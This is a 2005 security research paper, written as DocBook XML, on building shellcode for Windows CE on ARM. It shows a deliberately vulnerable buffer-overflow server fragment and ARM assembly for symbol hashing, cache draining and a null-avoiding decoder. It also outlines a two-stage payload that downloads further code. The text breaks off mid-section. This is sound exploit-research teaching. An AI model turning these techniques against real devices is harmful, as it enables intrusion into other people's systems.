<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.3//EN"
                  "http://www.docbook.org/xml/4.3/docbookx.dtd">
<!-- main doc -->
<article>

<articleinfo>
	<title>Exploring Windows CE Shellcode</title>
	<authorgroup>
		<author>
			<firstname>Tim</firstname><surname>Hurman</surname>
			<affiliation>
				<jobtitle>IT Security Consultant</jobtitle>
				<orgname>Pentest Limited.</orgname>
				<address>
					<email>timh at pentest.co.uk</email>
				</address>
			</affiliation>
		</author>
	</authorgroup>
	<copyright>
		<year>2005</year>
		<holder>Pentest Limited</holder>
	</copyright>
	<revhistory>
		<revision>
			<revnumber>1.0</revnumber>
			<date>27 June 2005</date>
			<authorinitials>TH</authorinitials>
			<revremark>Initial doc</revremark>
		</revision>
	</revhistory>
</articleinfo>

<sect1>
	<title>Introduction</title>
	<para>
Windows CE (WCE) is a Windows like operating system for various handheld
devices, including Personal Digital Assistants (PDAs) and Mobile Phones.
While at the API level, many of the function calls and interfaces are the
same as the standard version of Windows, much of the internals have been
altered to accommodate many different types of CPUs and architectures.
	</para>

	<para>
This paper will attempt to demonstrate the principals and techniques of
exploiting WCE/ARM using an example vulnerability. Much of the information
in this paper has been extracted from various public sources and in
certain cases is used to exploit other architectures such as IA32.
	</para>

	<para>
It is assumed that the reader will have working knowledge of Windows
exploit development and a grasp of the ARM assembly language. This
knowledge is fundamental to some of the procedures and code in this
paper.
	</para>

	<para id="source">
The master copy of this document is available from <ulink url='http://www.pentest.co.uk/documents/exploringwce/exploring_wce_shellcode.html'>http://www.pentest.co.uk/documents/exploringwce/exploring_wce_shellcode.html</ulink>.
	</para>

	<para>
The source package is available from <ulink url='http://www.pentest.co.uk/documents/exploringwce/exploring_wce_shellcode.tar.gz'>http://www.pentest.co.uk/documents/exploringwce/exploring_wce_shellcode.tar.gz</ulink>
	</para>
</sect1>


<sect1>
	<title>Windows CE memory architecture</title>

	<sect2>
		<title>Memory architecture</title>
		<para>
WCE, like Windows XP has a full 32bit addressable virtual memory map which
is divided in two to produce an upper 2GB of kernel space and a lower 2GB
of user space. In WCE, The lower 2GB user space is again divided in two.
This division provides the large memory area in the upper 1GB while the
lower 1GB is divided up into a sequence of <quote>slots</quote>. Each slot
equates to a running process with slot 0 being a virtual slot on the
currently running process.
		</para>

		<para>
In WCE 3.0, each slot is 32MB in size and internally divided up into code,
stack, heap and DLL space. Thus, WCE 3.0 may only have 32 processes
running at any moment in time. WCE .NET alters this and uses 64MB slots,
however, the process limit is maintained at 32. This is due to a trick
whereby read only ROM DLLs are mapped into the upper 32MB. This area is
constant across all processes regardless of which DLLs are required by a
specific process. Some documentation refers to the upper 32MB occupying
slot 1, however this implies that the maximum process number has decreased
by one, and is therefore incorrect.
		</para>

		<para>
The differences in the WCE 3.0 and .NET virtual memory layouts can be seen
in <xref linkend="wincememory"/>
		</para>

		<figure id="wincememory">
			<title>Windows CE Slot 0 layout</title>
			<mediaobject>
				<imageobject>
					<imagedata align="center" fileref="images/wince_slot0.jpg" format="JPEG"/>
				</imageobject>
			</mediaobject>
		</figure>
	</sect2>

	<sect2 id="memlayout">
		<title>DLLs, Heaps, Slots, Stacks and XIP</title>
		<titleabbrev id="memlayout_short">DLLs, Heaps, Slots, Stacks and XIP</titleabbrev>
		<para>
Taking a closer look at the slot layout, it can be seen that DLLs are
loaded in a top down manner starting with the eXecute In Place (XIP) DLLs.
The XIP DLLs are ROM based libraries that have read/write sections located
elsewhere within memory. For all intents and purposes, these can be used
as a standard DLL from the API level. In WCE 3.0, the XIP DLLs are loaded
from 0x01ffffff (32MB) down. In WCE .NET, XIP DLLs are loaded from
0x03ffffff (64MB) down to 0x0200000 (32MB). A non-XIP DLL may not be
loaded into this memory area.
		</para>

		<para>
To the end of the XIP area in WCE 3.0 or from 0x01ffffff (32MB) down in
WCE .NET, DLLs are loaded. Different DLLs may not occupy the same address
range in different processes, just as the same DLL may not occupy a
different address range in different processes. This implies that memory
is reserved for a DLL in all processes if it is loaded in one. This was
the core reason for the XIP space in WCE .NET. The loading of DLLs
decreases the usable application space in all processes, even if none of
the threads in a process is using the DLL. This process is illustrated in
<xref linkend="dll_load"/>, where space for all three DLLs is reserved in
all three processes, even if the DLL is not in use.
		</para>

		<figure id="dll_load">
			<title>Windows CE DLL loading</title>
			<mediaobject>
				<imageobject>
					<imagedata align="center" fileref="images/dll_load.jpg" format="JPEG"/>
				</imageobject>
			</mediaobject>
		</figure>

		<para>
The application code is loaded into virtual memory starting at address
0x10000. Above that sits the read only space, then the read write space,
the heap and finally the stack. This data grows up to meet the DLL space
growing downwards toward it.
		</para>
	</sect2>

	<sect2>
		<title>The Stack</title>
		<para>
WCE operates the ARM processor in little endian mode (ARM is switchable
between big and little endian). The stack is fully descending with the
stack pointer placed at the last item (lowest address). This processor
configuration should be familiar to IA32 programmers.
		</para>

		<para>
It should be noted at this point that WCE makes little or no use of the
frame pointer. The Microsoft APCS specifies modes were there frame pointer
is used, however in practice it was found that stack variables are
specified as an offset to the stack pointer. When exploiting WCE, the
frame pointer should not be relied upon to give the value of the current
frame address. Instead the frame pointer points to the start of the entire
stack (which is the first frame).
		</para>
	</sect2>

	<sect2>
		<title>Register descriptions</title>
		<table frame='all' id="registerdesc">
			<title>Register Descriptions</title>
			<tgroup cols='4' align='left' colsep='1' rowsep='1'>
			<colspec colname='Register' colwidth="2cm" />
			<colspec colname='Affinity' colwidth="2cm"/>
			<colspec colname='Aliases' colwidth="2cm"/>
			<colspec colname='Description' colwidth="10cm"/>
			<thead>
				<row>
					<entry>Register</entry>
					<entry>Affinity</entry>
					<entry>Aliases</entry>
					<entry>Description</entry>
				</row>
			</thead>
			<tbody>
				<row>
					<entry>R0</entry>
					<entry>Temporary</entry>
					<entry></entry>
					<entry>Argument 0, return value.</entry>
				</row>
				<row>
					<entry>R1</entry>
					<entry>Temporary</entry>
					<entry></entry>
					<entry>Argument 1. If argument 0 or the return value is larger than 32 bit, the second half goes in here.</entry>
				</row>
				<row>
					<entry>R2,R3</entry>
					<entry>Temporary</entry>
					<entry></entry>
					<entry>Arguments.</entry>
				</row>
				<row>
					<entry>R4-R10</entry>
					<entry>Permanent</entry>
					<entry></entry>
					<entry>General registers. R7 is the THUMB Frame Pointer (FP).</entry>
				</row>
				<row>
					<entry>R11</entry>
					<entry>Permanent</entry>
					<entry>FP</entry>
					<entry>Frame Pointer.</entry>
				</row>
				<row>
					<entry>R12</entry>
					<entry>Temporary</entry>
					<entry>IP</entry>
					<entry>General register. GCC/GAS knows this as IP.
This register is used to hold the size of the stack allocated by a
function in a <quote>release</quote> binary.</entry>
				</row>
				<row>
					<entry>R13</entry>
					<entry>Permanent</entry>
					<entry>SP</entry>
					<entry>Stack Pointer.</entry>
				</row>
				<row>
					<entry>R14</entry>
					<entry>Permanent</entry>
					<entry>LR</entry>
					<entry>Link Register (BL instruction stores the return address here).</entry>
				</row>
				<row>
					<entry>R15</entry>
					<entry>Permanent</entry>
					<entry>PC</entry>
					<entry>Program Counter.</entry>
				</row>
				<row>
					<entry>PSW</entry>
					<entry></entry>
					<entry></entry>
					<entry>Program Status Word. This is where the conditional flags sit.</entry>
				</row>
			</tbody>
			</tgroup>
		</table>
	</sect2>

	<sect2 id="chap_APCS">
		<title>APCS</title>
		<titleabbrev id="apcs_short">APCS</titleabbrev>
		<para>
The WCE ARM Procedure Call Standard (APCS) is not comparable with the
general APCS in use. For a function with four arguments or less,
each argument is placed in R0-R3 and the function is called (assuming each
argument is 32 bits in size). The function then saves R0-R3 to the stack
in ascending register order and saves old SP and LR before assigning space
for local variables. When returning, the argument space is subtracted from
the SP before loading SP and PC from the stack.
		</para>

		<para>
There exists a possibility that WCE will not save the return address for a
function. When a function uses no local variables, WCE does not save any
items on the stack. In this instance a heap variable or a stack variable
in another function may be overflowed and so the result may not be
immediately obvious.
		</para>

		<para>
This description of the APCS is only a summary of the full specification,
a link to which can be found in <xref linkend="appendix_doc"/>.
		</para>
	</sect2>

	<sect2>
		<title>Module list</title>
		<para>
Central to any exploit is the ability to call functions within the Windows
API. Before a function can be called, its address in memory must be
located. Windows CE holds a linked list of loaded DLLs, which can be
enumerated to obtain the symbol tables and therefore the function address.
		</para>

		<para>
As the source code for WCE .NET is available from Microsoft, it is
possible to trace the location of the linked list of modules without
disassembling <filename>coredll.dll</filename>, the DLL in which the
<function>LoadLibraryW</function> function exists. From an examination of
the file
<filename>\WINCE500\PRIVATE\WINCEOS\COREOS\NK\KERNEL\loader.c</filename>,
it was found that a global variable <varname>pModList</varname> was used
exclusively to locate the beginning of the module list, however this was
not defined.
		</para>

		<para>
The definition of <varname>pModList</varname> was traced and can be seen
in <xref linkend="pmodlist_def"/>. Above the <varname>pModList</varname>
definition, the <structname>PMODULE</structname> structure was found.
		</para>

		<figure id="pmodlist_def">
			<title>pModList Define</title>
			<programlisting>
<filename>\WINCE500\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h:785</filename>
#define pModList ((PMODULE)KInfoTable[KINX_MODULES])
			</programlisting>
		</figure>
		
		<para>
The definition for <structname>KInfoTable</structname> was found in 
<filename>\WINCE500\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h</filename> and
could be evaluated as a static address, 0xffffcb00. The value for
<varname>KINX_MODULES</varname> was found to be 9. The
<structname>KInfoTable</structname> was found to be an array of
<varname>DWORD</varname> variables, and therefore, the location of the
<structname>PMODULE</structname>linked list header was 0xffffcb24.
		</para>

		<para>
The <structname>PMODULE</structname> structure contains all the relevant
information regarding each DLL. In the interests of brevity
<xref linkend="pmoduleoffsets"/> enumerates only some of the important
offsets in this structure and their meaning.
		</para>

		<table frame='all' id="pmoduleoffsets">
			<title>PMODULE useful offsets</title>
			<tgroup cols='4' align='left' colsep='1' rowsep='1'>
			<colspec colname='Offset' colwidth="2cm" />
			<colspec colname='Size' colwidth="2cm" />
			<colspec colname='Type' colwidth="2.5cm" />
			<colspec colname='Description' colwidth="8cm"/>
			<thead>
				<row>
					<entry>Offset</entry>
					<entry>Size</entry>
					<entry>Type</entry>
					<entry>Description</entry>
				</row>
			</thead>
			<tbody>
				<row>
					<entry>0x04</entry>
					<entry>0x04</entry>
					<entry>PMODULE *</entry>
					<entry>Pointer to next <structname>PMODULE</structname> item.</entry>
				</row>
				<row>
					<entry>0x08</entry>
					<entry>0x04</entry>
					<entry>wchar_t *</entry>
					<entry>Pointer to the module name.</entry>
				</row>
				<row>
					<entry>0x7c</entry>
					<entry>0x04</entry>
					<entry>uint32_t</entry>
					<entry>The real address of the module in memory.</entry>
				</row>
				<row>
					<entry>0x8c</entry>
					<entry>0x04</entry>
					<entry>uint32_t</entry>
					<entry>The RVA address of the export table.</entry>
				</row>
			</tbody>
			</tgroup>
		</table>

		<para>
By enumerating the <structname>PMODULE</structname> list, all modules
loaded by the kernel will be found, whether they are in use by the current
thread (paged in) or not. This means that the desired module may be found
in the list, but may have an invalid address. To prevent an exception
occurring by accessing an invalid address, only
<filename>coredll.dll</filename> should be accessed initially. Before
enumerating the symbols in any secondary libraries,
<function>LoadLibraryW</function> should be called to page the module into
memory.
		</para>

		<para>
A second list of modules can be found from the
<structname>Process</structname> structure. This is a list of only the
modules loaded by the current process, however, it requires two extra
pointer dereferences and may still require the library to be loaded into
memory (if not already in use).
		</para>
	</sect2>


	<sect2>
		<title>The Export Table</title>
		<para>

The export table contains a list of all symbols, their ordinal and
Relative Virtual Address (RVA) within the module. The
<structname>ExpHdr</structname> structure definition can be found in
<filename>WINCE500\PUBLIC\COMMON\OAK\INC\pehdr.h"</filename>. This indicates
several important offsets within the structure which are listed in
<xref linkend="exphdroffsets"/>.

		</para>

		<table frame='all' id="exphdroffsets">
			<title>ExpHdr useful offsets</title>
			<tgroup cols='4' align='left' colsep='1' rowsep='1'>
			<colspec colname='Offset' colwidth="2cm" />
			<colspec colname='Size' colwidth="2cm" />
			<colspec colname='Type' colwidth="2.5cm" />
			<colspec colname='Description' colwidth="8cm"/>
			<thead>
				<row>
					<entry>Offset</entry>
					<entry>Size</entry>
					<entry>Type</entry>
					<entry>Description</entry>
				</row>
			</thead>
			<tbody>
				<row>
					<entry>0x18</entry>
					<entry>0x04</entry>
					<entry>uint32_t</entry>
					<entry>The number of exported symbol names.</entry>
				</row>
				<row>
					<entry>0x1c</entry>
					<entry>0x04</entry>
					<entry>uint32_t *</entry>
					<entry>List of symbol RVAs.</entry>
				</row>
				<row>
					<entry>0x20</entry>
					<entry>0x04</entry>
					<entry>char **</entry>
					<entry>List of symbol names.</entry>
				</row>
				<row>
					<entry>0x24</entry>
					<entry>0x04</entry>
					<entry>uint16_t *</entry>
					<entry>List of symbol ordinals.</entry>
				</row>
			</tbody>
			</tgroup>
		</table>

		<para>
It should be noted that the three list items are not in sequence, thus if
a required symbol name is found at names[3], the RVA is not in RVA[3].
However, the list of ordinals and names are in sequence. Therefore, the
RVA of the required symbol would be RVA[ordinals[3]]. It is presumed that
this design was used to save memory, since if the lists were kept in order,
the list of names would be longer and contain possible NULL values.
		</para>

		<para>
The PE-COFF header format is common shown above is common to other Windows
based operating systems and should be familiar to writes of IA32/x86
exploits.
		</para>

	</sect2>

</sect1>

<sect1>
	<title>The Exploitable Program</title>
	<para>
Included in the accompanying source package is the full source for the
vulnerable test program used throughout this paper. This program waits for
a connection on port 4000, and then reads data until the client
disconnects. This underpins the operation of many applications, however,
in this case the author has made a basic programming error which allows
for the buffer to be overflowed. The susceptible code can be seen in <xref
linkend="vulnerablecode"/>.
	</para>

	<figure id="vulnerablecode">
		<title>server.cpp Vulnerable code fragment</title>
		<programlisting>
char string[1024];

.
.
for(pos = 0; (i=recv(csock, buf, 1024, 0)) > 0;){
	memcpy(string+pos, buf, i);
	pos += i;
}
		</programlisting>
	</figure>
</sect1>


<sect1>
	<title>Shellcode</title>

	<sect2>
		<title>The Toolkit</title>
		<para>
Before writing any shellcode you will need to obtain an assembler and be
comfortable using it. If you know of any assembler such as
<command>nasm</command> that can produce a binary file of your shellcode,
that will be best. At the time of writing no such assembler exists and so
GNU AS will be used to generate the opcodes. You will need to either
compile your own from source (location in <xref linkend="appendix_sw"/>)
as the assembler needs to support the <quote>arm-wince-pe</quote> target.
The Binutils package contains extra utilities required to extract the
opcodes from the resulting COFF file, and <command>hexdump</command> will
be used to display them in a format suitable for including into any C
source.
		</para>
		<para>
When testing the shellcode, it will be compiled into an executable using
<productname>Embedded Visual C++</productname>. This can be downloaded
freely from Microsoft, the location is in <xref linkend="appendix_sw"/>.
		</para>

		<warning>
			<para>
When using GNU AS to assemble the code, ensure that Binutils was
configured with <quote>arm-wince-pe</quote> as the target. Failure to
do so will generate code with invalid branch instructions. This is due to
WCE only being able to execute code on a 32 bit aligned address, and
therefore, branches are specified in a word offset rather than a byte
offset.
			</para>
		</warning>
	</sect2>

	<sect2>
		<title>Shellcode Stages</title>
		<para>
The shellcode has been divided up into two stages. The first stage
shellcode is injected during the initial exploit. The main purpose of this
code is to contact a specified IP address and download the second stage
shellcode into memory. The second stage shellcode will be placed on heap
memory to avoid the stack growing over the first or second stage
shellcode. Having downloaded the second stage, the instructions pointer
will be set to the beginning of this code. This method allows for a much
larger and more complex second stage, which can even be compiled from C
into a binary and then extracted. This enables much faster development of
the second stage, and allows the first stage to remain almost constant.
		</para>
	</sect2>

	<sect2>
		<title>String Hashing</title>
		<para>
Part of the shellcode's operation is to obtain symbol addresses from
libraries. To obtain this information we must have a copy of the symbol
name or library name to match against. As it is both inefficient and
problematic (see <xref linkend="thezeroproblem"/>) to place the whole
string into the shellcode, a hash value will be placed there instead. The
hash has to be recreated by the shellcode and therefore efficient with
regards to the number of instructions used.
		</para>

		<figure id="stringhash">
			<title>String hash function</title>
			<programlistingco>
				<areaspec>
					<area id="stringhash.1" coords="7" units="linecolumn"/>
					<area id="stringhash.2" coords="9" units="linecolumn"/>
					<area id="stringhash.3" coords="11" units="linecolumn"/>
					<area id="stringhash.4" coords="12" units="linecolumn"/>
					<area id="stringhash.5" coords="13" units="linecolumn"/>
					<area id="stringhash.6" coords="15" units="linecolumn"/>
				</areaspec>
				<programlisting>/*
 * generate a hash value from a unicode/ascii string
 * args: r0 = unused, r1 = char[0],  r2 = char size, ret: r0 = hash
 * Always load bytes. We will really only be looking at ascii anyway
 */
hash_str:
    mvn    r0, #0
hash_str_loop:
    ldrb   r3, [r1]
hash_str_genhash:
    bic    r3, r3, #0x20
    eor    r0, r3, r0, ror #8
    add    r1, r1, r2
    cmp    r3, #0
    bne    hash_str_loop
hash_str_return:
    mov    pc, lr
				</programlisting>
				<calloutlist>
					<callout arearefs="stringhash.1">
						<para>
Initialise the hash register with 0xffffffff.
						</para>
					</callout>
					<callout arearefs="stringhash.2">
						<para>
Even when hashing a unicode string, only the first byte is considered
significant. This saves a series of conditionals that determine the number
of bytes to load. In reality, all of the symbols the shellcode will use are
contained in DLLs that have ASCII names.
						</para>
					</callout>
					<callout arearefs="stringhash.3">
						<para>
Convert characters to uppercase. This also has an effect on other
characters, not just [a-z]. However as long as the reference hashing in
<filename>xor_str.c</filename> is consistent, this is not a significant
problem.
						</para>
					</callout>
					<callout arearefs="stringhash.4">
						<para>
This performs the hash function by rotating r0 right by 8 bits, then
exclusive-ORing the next character.
						</para>
					</callout>
					<callout arearefs="stringhash.5">
						<para>
Increment the string position to the next unicode (16bit) character. This
increments by adding the character size of the current address.
						</para>
					</callout>
					<callout arearefs="stringhash.6">
						<para>
Terminate the hashing function when '\0' is found.
						</para>
					</callout>
				</calloutlist>
			</programlistingco>
		</figure>


		<para>
<xref linkend="stringhash"/> shows the string hashing function. This
generates 32 bit word hashes which can be compared to a pre-stored value
at compile time. A hash generator, <filename>xor_str.c</filename>, is
available in the source distribution.
		</para>

		<para>

Special note should be made to the complete lack of adherence to the
<xref linkend="chap_APCS" endterm="apcs_short"/>, in order to minimise the
number of bytes used for the opcodes. One of the easiest ways to achieve
smaller bytecode is to avoid using the stack or memory, and keep
variables register bound for as long as possible. The main disadvantage of
this method is that the shellcode must keep track of what registers are in
use and what they are for. As there is no intention of returning to the
original code, registers may be used at will. Hence, in
<xref linkend="stringhash"/>, the first argument is in r1, so the hash can be
generated and returned in r0.  This saves 8 bytes which would have been
required to place the hash in r0 for the return.
		</para>

		<para>
This hash function is case insensitive, therefore hash value of
<filename>coredll.dll</filename> will equal that of
<filename>coredll.DLL</filename>. This increases the chance that a hash
value will clash with another, however, it decreases the chance that a
certain DLL will not be found. In certain cases, the hash value will always
be equal, for instance <quote>abc2def</quote> and
<quote>def2abc</quote> will both generate the same hash value.
		</para>

	</sect2>

	<sect2>
		<title>Symbol Location</title>
		<para>
Before either the first or second stage shellcode can start executing its
primary task, it must locate the addresses of all the symbols required.
The code for this can be found in <filename>getsyms.s</filename> which is
included into both the first and second stage shellcode.
<xref linkend="dllsymseek"/> shows the pseudo code for this DLL/symbol
location.
		</para>

		<figure id="dllsymseek">
			<title>DLL/Symbol Location Pseudo Code</title>
			<programlisting>
uint32_t dlls[] = {
	0xadb0bcb4, /* hash of coredll.dll */
	0xb6b9a3a2, /* hash of winsock.dll */
};

uint32_t sym_hashes = {
	0xfdf5e1b3, /* hash of coredll.dll::realloc */
};

void findsym(PMODULE *pm)
{
	uint32_t base_addr = pm->e32.e32_vsize;
	struct ExpHdr exp = base_addr + pm->e32.e32_unit[0].rva;
	uint32_t namecnt = exp->exp_namecnt;
	char **name = exp->exp_name;
	uint16_t *ordinal = exp->exp_ordinal;
	uint32_t *rva = exp->exp_eat;
	uint32_t hv, i;

	while (1) {
		namecnt--;
		if (namecnt &lt; 0) break;
		hv = hashstring(name[namecnt]);

		i = 2; /* the number of symbol hashes */
		while (1) {
			i--;
			if (i &lt; 0) break;
			if (sym_hashes[i] != hv) continue;
			sym_hashes[i] = rva[ordinal[namecnt]] + base_addr;
		}
	}
}

void finddll(void)
{
	dllno = 2; /* the number of dll hashes */
	PMODULE *pm;
	uint32_t hv;

	while (1) {
		dllno--;
		if (dllno &lt; 0) break;
		pm = (PMODULE*)0xffffcb24;
		do {
			hv = hashstring(pm->lpszModName);
			if (hv == dlls[dllno]) findsym(pm);
		} while (pm != NULL);
	}
}
			</programlisting>
		</figure>

		<para>
The pseudo code shown in <xref linkend="dllsymseek"/> is a direct
translation of the assembly, and therefore looks untidy. This is however
optimised to reduce the number of instructions required.
		</para>

		<para>
<xref linkend="dllsymseek"/> also shows the mobile's base address being
stored in <structname>pm->e32.e32_vsize</structname>, even though an item
called <structname>pm->e32.e32_vbase</structname> exists. It is unknown
why this occurs, however the base address is in the
<structname>pm->e32.e32_vsize</structname> element.
		</para>

		<para>
Careful readers will note that the <function>findsym</function> function
tries to locate all symbol hashes in the current module, whether they
belong there or not. While this increases the risk of a hash collision, it
eliminates several conditionals from the shellcode and removes the problem
of the WinSock DLLS. Older versions of WCE use
<filename>winsock.dll</filename>, whilst newer versions use
<filename>ws2.dll</filename>. By specifying both of these DLLs, the
shellcode is made more portable and will run on both WCE 3.0 and WCE .NET
devices. Further investigation revealed that both
<filename>winsock.dll</filename> and <filename>ws2.dll</filename> existed
on WCE 4.2 and so the <structname>dlls</structname> array in
<xref linkend="dllsymseek"/> does not include the hash for
<filename>ws2.dll</filename>.
		</para>

		<para>

Finally, it is possible that the whole process of symbol location may not
be required. The <xref linkend="memlayout" endterm="memlayout_short"/>
section discussed XIP DLLs and how they do not move in memory, inferring
that the symbol addresses do not move either. Therefore if the shellcode
is being targeted at one specific version of WCE, the symbol addresses may
be hard coded. However, since the address will be determined when the ROM
is generated, the symbol address may not be constant across multiple
vendors, even if the WCE version is constant. On the other hand,
<filename>coredll.dll</filename> and <filename>winsock.dll</filename> are
frequently used and therefore may remain constant across multiple vendors
by coincidence. Too few devices have been examined to confirm or deny this
and therefore the symbol location code was used. XIP DLLs will not be
constant across WCE 3.0 and WCE .NET devices since the memory layout was
altered.

		</para>
	</sect2>

	<sect2>
		<title>Function Calling Convention</title>
		<para>
When calling a function address, a full 32 bit address needs to be called.
Since ARM instructions are only 32 bits wide this will not be possible. It
is also unlikely that all function addresses will encode into the opcode
address calling space, which is limited to 12 bits (8 address bits and 4
shift bits). Therefore, a stub function is required to make the hop. The
stub is well within the calling range for a local jump and also provides a
static calling address. Before calling the stub, r12 is loaded with the
real function address. The stub function then moves r12 into the program
counter to call the function.
		</para>
	</sect2>

	<sect2>
		<title>Shellcode Issues</title>
		<sect3>
			<title>Caches and Buffers</title>
			<para>
The ARM processor is based on the Harvard architecture rather than the
classic Von Neumann design. As such, data and instructions are segregated
into two separate buses, each with a separate set-associative cache.
Between the data cache and main memory there is a write buffer. The data
cache operates in <quote>write-back</quote> mode, thus creating a validity
problem. It is possible that when the exploit is injected, the data is
sent to the data cache but not yet written back to main memory. Therefore
when the same address is read on the instruction bus, the exploit code
will not be present and random junk will be executed instead. It was found
that on calling, the first few instructions were found to have been
flushed back, allowing the exploit to initiate but not complete. To fix
this problem, the write buffer must be flushed to send all data back to
main memory, synchronising caches and memory. It is not necessary to
invalidate the instruction cache as it is unlikely that instructions will
have been read from the stack region of memory.
			</para>

			<para>
Three instructions are required to flush the write buffer. The
instructions for this process can be seen in <xref linkend="invinstr"/>.
			</para>

			<figure id="invinstr">
				<title>Buffer Drain Technique</title>
				<programlistingco>
					<areaspec>
						<area id="invinstr.1" coords="1" units="linecolumn"/>
						<area id="invinstr.2" coords="2" units="linecolumn"/>
						<area id="invinstr.3" coords="3" units="linecolumn"/>
					</areaspec>
					<programlisting>    mcr    p15, 0, r0, c7, c10, 4
    mrc    p15, 0, r0, c2, c0, 0
    mov    r0, r0
					</programlisting>
					<calloutlist>
						<callout arearefs="invinstr.1">
							<para>Instruction to drain the write
buffer. The contents of r0 are irrelevant.</para>
						</callout>
						<callout arearefs="invinstr.2">
							<para>Arbitrary read of CP15.</para>
						</callout>
						<callout arearefs="invinstr.3">
							<para>Wait for the drain to complete.</para>
						</callout>
					</calloutlist>
				</programlistingco>
			</figure>

			<para>
It is worth noting that exploit code development would be considerably
harder if WCE implemented rudimentary security measures. This
is because the <quote>mcr</quote> and <quote>mrc</quote> instructions are
privileged. Since the whole of WCE, including user code, runs in
privileged mode, exploits are viable.
			</para>
		</sect3>

		<sect3>
			<title>WCE 3.0 and the Sensitive Stack</title>
			<para>
While testing shellcode it was found that WCE was very sensitive to the
program counter placement with respect to the stack. The general rule
discovered was that if (SP &lt;= PC &amp;&amp; PC &lt;=  FP) then the
operating system would hang. It is unknown whether this occurred at a
context switch or due to some code in <filename>coredll.dll</filename>. It
is unlikely that this is an intentional stack protection mechanism. The OS
also seemed to hang when the PC was placed just above the FP. This may
have been due to the PC being in an area of memory reserved for another
thread's stack.
			</para>

			<para>
Further testing revealed that if any attempt was made to move the stack
further up in memory, the device would also hang. It is likely that the OS
was being confused by a stack from one thread impinging on the memory
reserved for another thread although this has not yet been confirmed.
			</para>

			<para>
Due to the sensitive nature of the stack, the decision was made to destroy
the current stack, moving the FP value to the SP. This creates an area of
memory between the SP and the shellcode for functions to use. During
testing it was found that the area of memory created was not large enough
to use functions safely. Functions would routinely overwrite the shellcode
and cause unpredictable behavior, often resulting in the hard reset of the
device.
			</para>

			<para>
The only option left for the shellcode was to increase the amount of
memory between the SP and the shellcode. Since the default stack size of
WCE is 1MB, a large amount of space below the SP was available. The
additive decoder function does not call any functions and so can safely
execute in the area close to the SP. Therefore the additive decoder can be
used to move the shellcode away from the SP allowing it to execute safely
and reliably.
			</para>

			<para>
It should be noted that this effect can be used to force the owner of the
device to reset following a failed overflow attempt. If the process that
is being exploited is started at run time, a soft reset of the device will
cause it to be restarted and will therefore offer another chance at
exploitation.
			</para>
		</sect3>

		<sect3 id="thezeroproblem">
			<title>The Zero Problem</title>
			<para>
In many applications, data reception will terminate on a NULL or \0
character. This poses a particular problem for the ARM architecture as
many instructions contain 8 bit aligned zeros as padding or flag fields.
There are two common methods for zero avoidance: firstly, tailoring each
instruction individually to remove any cases or secondly, using a decoder
to remove a 32 bit additive from each instruction.
			</para>

			<para>
The first method results in slightly smaller code. However multiple
instructions may be needed where only one instruction was required if
zero characters were allowed. This method is also labour intensive and
requires that structures containing zeros be dynamically generated.
			</para>

			<para>
The second method requires that a decoder be placed in front of the
shellcode. Whilst the decoder must not contain any zero characters the
rest of the shellcode may. The complete decoder requires sixteen
instructions and therefore an extra 64 bytes. If the shellcode were
guaranteed not to contain any 32 bit zero values, approximately four
instructions could be removed. This is not usually possible as some
structures may require a zero value.
			</para>

			<para>
To maintain the simplicity of the first stage shellcode, it was decided
that the second method be used. Having assembled the shellcode,
<filename>e954</filename> can be used to generate the additive value.
<filename>e954</filename> generates the additive value by adding a number
to each 32 bit instruction in turn. When the result of the instruction and
the additive contains an 8 bit aligned zero character, a value of 1 is
added to that particular byte and the encoding is rechecked from the
beginning. Any carry bits generated by the encoding are ignored. While this
method of encoding is relatively simple, it is quick to generate the
additive and easy to decode. Armed with this additive, the shellcode
injector will automatically encode the assembly.
			</para>

			<para>
Specific exploits may be sensitive to characters other than \0, or
indeed may require specific encoding techniques for non ASCII character
sets. Examples of these applications can be seen in <productname>The
Shellcoder's Handbook</productname>.
			</para>
		</sect3>

		<sect3>
			<title>The Additive Decoder</title>

		<figure id="additivedec">
			<title>Additive Decoder Function</title>
			<programlistingco>
				<areaspec>
					<area id="additivedec.1" coords="1" units="linecolumn"/>
					<area id="additivedec.2" coords="2" units="linecolumn"/>
					<area id="additivedec.3" coords="4" units="linecolumn"/>
					<area id="additivedec.4" coords="5" units="linecolumn"/>
					<area id="additivedec.5" coords="6" units="linecolumn"/>
					<area id="additivedec.6" coords="10" units="linecolumn"/>
					<area id="additivedec.7" coords="11" units="linecolumn"/>
					<area id="additivedec.8" coords="12" units="linecolumn"/>
					<area id="additivedec.9" coords="13" units="linecolumn"/>
					<area id="additivedec.10" coords="14" units="linecolumn"/>
					<area id="additivedec.11" coords="15" units="linecolumn"/>
					<area id="additivedec.12" coords="16" units="linecolumn"/>
					<area id="additivedec.13" coords="19" units="linecolumn"/>
				</areaspec>
				<programlisting>    mcr    p15, 0, r7, c7, c10, 4
    mov    sp, fp

    adr    r4, additive
    ldr    r5, [r4, #-0x04]
    sub    r6, pc, #0x8000
    mov    r3, r6
    adr    r2, shellcode_start
additive_start:
    ldr    r1, [r2], #0x04
    sub    r1, r1, r5
    str    r1, [r3], #0x04
    subs   r1, r4, r2
    bne    additive_start

    mcr    p15, 0, r7, c7, c10, 4
    mrc    p15, 0, r1, c2, c0, 0
    mov    r1, r1
    mov    pc, r6
shellcode_start:
additive:
				</programlisting>
				<calloutlist>
					<callout arearefs="additivedec.1">
						<para>Drain the write buffer.</para>
					</callout>
					<callout arearefs="additivedec.2">
						<para>Erase the current stack.</para>
					</callout>
					<callout arearefs="additivedec.3">
						<para>Load r4 with the address of the additive.
This value is used for comparison by the decoder to determine when the end
of the shellcode has been reached. This instruction is altered by the
shellcode injector to point to the real address. A Dummy label is included
for assembly only, the actual value is altered by
<filename>e954</filename>.</para>
					</callout>
					<callout arearefs="additivedec.4">
						<para>Load r5 with the additive. 4 is subtracted
from the address to prevent a \0 appearing in the resulting encoding.</para>
					</callout>
					<callout arearefs="additivedec.5">
						<para>Load r6 with the new address from the
shellcode. This also saves an instruction to invalidate the cache, as the
instruction cache should have no knowledge of this area and would
therefore have to retrieve it from main memory. The new address is 23KB
away from the current value of the PC, creating enough space for the stack
to expand. The value is copied to r3 for use, the value in r6 is
constant.</para>
					</callout>
					<callout arearefs="additivedec.6">
						<para>Load r2 with the start address of the
encoded shellcode.</para>
					</callout>
					<callout arearefs="additivedec.7">
						<para>Load r1 with the instruction to decode.
Having loaded the instruction, 4 is added to the value of r2, incrementing
it to the next instruction.</para>
